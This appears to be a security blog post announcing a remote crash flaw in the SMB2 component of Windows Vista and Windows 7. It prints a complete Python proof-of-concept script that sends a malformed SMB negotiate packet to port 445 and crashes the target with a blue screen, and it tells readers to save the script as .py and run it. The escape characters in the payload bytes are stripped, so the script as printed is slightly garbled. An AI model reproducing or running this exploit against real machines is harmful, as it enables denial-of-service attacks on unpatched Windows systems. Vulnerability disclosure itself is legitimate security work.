Windows Vista / seven SMB Remote REQUEST zero day

Windows Vista / Windows 7 SMB Remote REQUEST zero day Vulnerability has been discovered by Laurent Gaffié .

In our previous post we told you how to get free Windows 7 ultimate DVD and here’s a new zero day Vulnerability .

c4def9905730ef4865c7598128f5482c Windows Vista / Windows 7 SMB Remote REQUEST 0 day!

Name of vulnerability – Windows Vista/7 : SMB2.0 NEGOTIATE PROTOCOL REQUEST Remote B.S.O.D.

How it works?

SRV2.SYS fails to handle malformed SMB headers for the NEGOTIATE PROTOCOL REQUEST functionnality.
The NEGOTIATE PROTOCOL REQUEST is the first SMB query a client send to a SMB server, and it’s used to identify the SMB dialect that will be used for futher communication.

A python script (source code) proof of concept

#!/usr/bin/python # When SMB2.0 recieve a "&" char in the "Process Id High" SMB header field it dies with a # PAGE_FAULT_IN_NONPAGED_AREA

from socket import socket from time import sleep

host = "IP_ADDR", 445 buff = ( "x00x00x00x90" # Begin SMB header: Session message "xffx53x4dx42" # Server Component: SMB "x72x00x00x00" # Negociate Protocol "x00x18x53xc8" # Operation 0x18 & sub 0xc853 "x00x26"# Process ID High: --> normal value should be "x00x00" "x00x00x00x00x00x00x00x00x00x00xffxffxffxfe" "x00x00x00x00x00x6dx00x02x50x43x20x4ex45x54" "x57x4fx52x4bx20x50x52x4fx47x52x41x4dx20x31" "x2ex30x00x02x4cx41x4ex4dx41x4ex31x2ex30x00" "x02x57x69x6ex64x6fx77x73x20x66x6fx72x20x57" "x6fx72x6bx67x72x6fx75x70x73x20x33x2ex31x61" "x00x02x4cx4dx31x2ex32x58x30x30x32x00x02x4c" "x41x4ex4dx41x4ex32x2ex31x00x02x4ex54x20x4c" "x4dx20x30x2ex31x32x00x02x53x4dx42x20x32x2e" "x30x30x32x00" ) s = socket() s.connect(host) s.send(buff) s.close()

Remember to rename your file as .py

Attacker using any operating system, can crash the services!

Systems affected:
Windows Vista/7 All (64b/32b|SP1/SP2 fully updated) and possibly Windows Server 2008

For more information click here on SMB version.

Searches leading to this post:
windows 7 smb exploit python, python connect to smb, windows vista SMB tools, Windows SMB2 0 exploit tutorial, windows 7 smb tutorial, windows 7 remote BSoD python script, SMB2 negotiate protocol request header, smb2 0 perl script, SMB rename operations from Vista clients, smb python script, smb 2 0 exploit python code, zero remote 0908

January 19, 2010 -- How to exploit IE 0day aka (Aurora) With MetaSploit?
December 22, 2009 -- PE GUARD – Protects executable files from virus infections
November 12, 2009 -- New 0day: Windows 7 and Server 2008R2 Remote Kernel Crash exploit POC!
September 30, 2009 -- SMB2 BSODer!
June 30, 2009 -- Secunia – Personal Software Inspector (PSI) tool
June 29, 2009 -- IOCTL Fuzzer – searching vulnerabilities in Windows
March 12, 2010 -- winxpcalc-shellcode.txt
March 12, 2010 -- ms10_002_aurora.rb.txt
March 12, 2010 -- samagraph-sql.txt

Tagged as: Vulnerability Scanner, Windows, zero day

Black: Yes indeed. Those are very basic commands, which will work on “clean” operating systems.
trueliar: Are you serious? Those are very simple *nix commands. I hope that you are ironic.
Black: @sanyal, I do not know why is it not downloading the version 0.8 for you! We have this link from SF which will...
sanyal: Hi, The download link goes to sourceforge.net 0.7 version. Needs to point to 0.8
hideaki: There’s also xt_pknock which seems to capable of much more.
stacksmasher: Any word on a quick tutorial for this tool?
ne01982: No, I had written the supplied OEM code, But the site says that is a wrong OEM code. Thanks for your time

Windows Vista / Windows 7 SMB Remote REQUEST 0 day!

Related Posts

Twitter

Tag Cloud

Archives

Meta

Recently Updated Posts

Recently Updated Pages

Feed Count:

Site Search:

Categories

Recent Comments

Most Viewed Pages